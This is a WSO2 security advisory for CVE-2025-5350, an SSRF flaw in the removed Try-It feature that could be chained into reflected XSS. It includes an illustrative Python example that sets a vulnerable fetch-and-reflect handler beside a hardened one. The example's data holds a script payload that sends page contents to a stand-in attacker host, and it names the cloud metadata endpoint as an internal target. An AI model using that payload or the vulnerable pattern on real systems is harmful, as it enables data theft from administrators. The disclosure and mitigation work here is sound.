Security Advisory WSO2-2025-4124/CVE-2025-5350
Published: 2025-10-24
Version: 1.0.0
Severity: Medium
CVSS Score: 5.9 (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L)
CVE IDs: CVE-2025-5350
AFFECTED PRODUCTS
- WSO2 API Control Plane: 4.5.0
- WSO2 API Manager: 4.5.0, 4.4.0, 4.3.0, 4.2.0, 4.1.0, 4.0.0, 3.2.1, 3.2.0, 3.1.0
- WSO2 Enterprise Integrator: 6.6.0
- WSO2 Identity Server as Key Manager: 5.10.0
- WSO2 Identity Server: 7.1.0, 7.0.0, 6.1.0, 6.0.0, 5.11.0, 5.10.0
- WSO2 Open Banking AM: 2.0.0
- WSO2 Open Banking IAM: 2.0.0
- WSO2 Traffic Manager: 4.5.0
- WSO2 Universal Gateway: 4.5.0
OVERVIEW
The deprecated Try-It feature has been removed to address an SSRF vulnerability that could be chained into an XSS flow.
DESCRIPTION
The legacy Try-It feature, which was accessible only to users with administrative privileges, accepted user-supplied URLs without validation. This could result in Server-Side Request Forgery (SSRF). Since the retrieved content was incorporated directly into the HTML response, the same flaw could also be used to perform reflected cross-site scripting in the administrative user's browser context.
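The pattern described above, shown as an added example that is not WSO2 code: a handler that fetches a user-supplied URL and concatenates the body into HTML (the vulnerable shape), beside a hardened version that validates the target before fetching and HTML-escapes the body before embedding it. The hostnames, the allowlist, and the in-memory "network" are constructed for the example so it runs offline; the function names are hypothetical.

```python
"""Added example (not WSO2 code): SSRF-to-XSS via an unvalidated fetch-and-reflect
handler, beside a hardened version. All URLs and responses below are constructed."""
import html
import ipaddress
from urllib.parse import urlparse

# Constructed stand-in for the network: URL -> body the server would retrieve.
FAKE_NETWORK = {
    "http://169.254.169.254/latest/meta-data/": "ami-id\ninstance-id\n",
    "https://10.0.0.5:8080/admin": "<h1>Internal admin console</h1>",
    "https://attacker.example/payload":
        "<script>fetch('https://attacker.example/?c=' + document.body.innerHTML)</script>",
    "https://api.example.com/openapi.json": '{"openapi":"3.0.0"}',
}


def fake_fetch(url):
    """Simulates the server's outbound GET (constructed data, no redirects followed).
    A real fetcher must also refuse to follow redirects, or re-validate each hop."""
    if url not in FAKE_NETWORK:
        raise ConnectionError(f"unreachable: {url}")
    return FAKE_NETWORK[url]


def try_it_vulnerable(url):
    """Vulnerable shape: any URL is fetched, and the raw body is concatenated into HTML.
    An admin lured to ?url=https://attacker.example/payload gets reflected XSS; an
    internal URL turns the server into a proxy for non-public endpoints."""
    body = fake_fetch(url)
    return "<div class='try-it'>" + body + "</div>"


def validate_target(url, allowed_hosts=None):
    """Accept only https URLs without embedded credentials. With an allowlist, the
    host must be on it; without one, fall back to rejecting literal private,
    loopback, link-local and reserved addresses. The fallback is weaker: a hostname
    that resolves to an internal address (DNS rebinding) needs a resolution-time
    check, which this offline example cannot perform."""
    p = urlparse(url)
    if p.scheme != "https":
        raise ValueError("only https targets are allowed")
    if p.username or p.password:
        raise ValueError("credentials in the target URL are not allowed")
    host = p.hostname or ""
    if not host:
        raise ValueError("missing host")
    if allowed_hosts is not None:
        if host.lower() not in {h.lower() for h in allowed_hosts}:
            raise ValueError("host is not on the allowlist")
        return url
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return url  # a hostname; see the DNS-rebinding caveat above
    if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
        raise ValueError("internal address is not allowed")
    return url


def is_rejected(url, allowed_hosts=None):
    """True if validate_target refuses the URL (convenience for checks/tests)."""
    try:
        validate_target(url, allowed_hosts)
    except ValueError:
        return True
    return False


def try_it_hardened(url, allowed_hosts=None):
    """Hardened shape: validate the target first, then treat the response as data,
    never as markup, by escaping it before embedding."""
    validate_target(url, allowed_hosts)
    body = fake_fetch(url)
    return "<pre class='try-it'>" + html.escape(body) + "</pre>"


if __name__ == "__main__":
    print(try_it_vulnerable("https://attacker.example/payload"))   # script lands in the page
    print(try_it_hardened("https://attacker.example/payload"))     # escaped, inert text
    print(is_rejected("http://169.254.169.254/latest/meta-data/"))  # True
```

The allowlist is the control to prefer when the feature has a known set of legitimate targets (as an API-testing tool typically does); the address-range denylist is a fallback for the open-ended case and is bypassable via DNS resolution and redirects unless those are checked at request time. Removing the feature, as this advisory does, eliminates both problems at once.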
IMPACT
Combined SSRF and XSS: by tricking an administrator into visiting a crafted URL, an attacker can make the server fetch attacker-controlled content, which is then reflected into the administrator's browser, allowing arbitrary script execution to modify the UI or exfiltrate data.
Note that session cookies are protected with the HttpOnly flag, mitigating direct session hijacking.
Internal Service Enumeration: if a malicious actor with administrative privileges visits a specially crafted link, the SSRF can be used to query non-public endpoints reachable from the WSO2 product deployment, aiding in mapping internal network resources.
SOLUTION
This release removes the Try-It feature, the root cause of both the SSRF and the XSS, thereby reducing the attack surface.
Community Users (Open Source)
Apply the relevant fixes to your product using the public fix(es) provided below.
If applying the fix or update is not feasible, migrate to the latest unaffected version of the respective WSO2 product(s).
Support Subscription Holders
Update your product to the specified update level—or a higher update level—to apply the fix.
Info: WSO2 Support Subscription Holders may use WSO2 Updates in order to apply the fix.
| Product Name | Product Version | Update Level |
|---|---|---|
| WSO2 API Control Plane | 4.5.0 | 7 |
| WSO2 API Manager | 4.5.0 | 7 |
| WSO2 API Manager | 4.4.0 | 23 |
| WSO2 API Manager | 4.3.0 | 60 |
| WSO2 API Manager | 4.2.0 | 147 |
| WSO2 API Manager | 4.1.0 | 209 |
| WSO2 API Manager | 4.0.0 | 369 |
| WSO2 API Manager | 3.2.1 | 47 |
| WSO2 API Manager | 3.2.0 | 428 |
| WSO2 API Manager | 3.1.0 | 332 |
| WSO2 Enterprise Integrator | 6.6.0 | 218 |
| WSO2 Identity Server | 7.1.0 | 27 |
| WSO2 Identity Server | 7.0.0 | 120 |
| WSO2 Identity Server | 6.1.0 | 245 |
| WSO2 Identity Server | 6.0.0 | 246 |
| WSO2 Identity Server | 5.11.0 | 415 |
| WSO2 Identity Server | 5.10.0 | 359 |
| WSO2 Identity Server as Key Manager | 5.10.0 | 352 |
| WSO2 Open Banking AM | 2.0.0 | 380 |
| WSO2 Open Banking IAM | 2.0.0 | 401 |
| WSO2 Traffic Manager | 4.5.0 | 7 |
| WSO2 Universal Gateway | 4.5.0 | 7 |
CREDITS
WSO2 thanks Noël MACCARY for responsibly reporting the identified issue and working with us as we addressed it.